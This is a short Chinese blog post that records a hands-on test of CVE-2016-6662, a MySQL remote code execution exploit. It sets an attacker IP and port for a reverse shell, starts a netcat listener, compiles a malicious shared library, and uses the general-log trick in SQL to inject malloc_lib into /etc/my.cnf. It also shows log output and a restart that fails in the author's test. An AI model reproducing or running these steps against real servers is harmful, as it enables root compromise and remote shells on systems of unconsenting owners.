CVE-2016-6662 mysql RCE测试

参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法

1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:

#define ATTACKERS_IP "xx.x.x.x"
#define SHELL_PORT 81

在攻击者机器上做好端口监听,等待反弹:

nc -lvv -p 81

  

2.编译库
gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl


3.执行命令:

mysql> set global general_log_file = '/etc/my.cnf';

mysql> set global general_log = on;

mysql> select '
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

';

mysql> set global general_log = off;

  

4.可以发现my.cnf添加的内容

/usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:
Tcp port: 3306 Unix socket: /tmp/mysql.sock
Time Id Command Argument
160914 17:45:16 1 Query select '
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

'
160914 17:45:22 1 Query set global general_log = off

  

5 然后重启mysql,mysql重启会报错

leo@ubuntu:~$ sudo /etc/init.d/mysql restart
[....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details.
failed!

 

posted @ 2016-09-14 18:03  小小leo  阅读(1989)  评论(0编辑  收藏  举报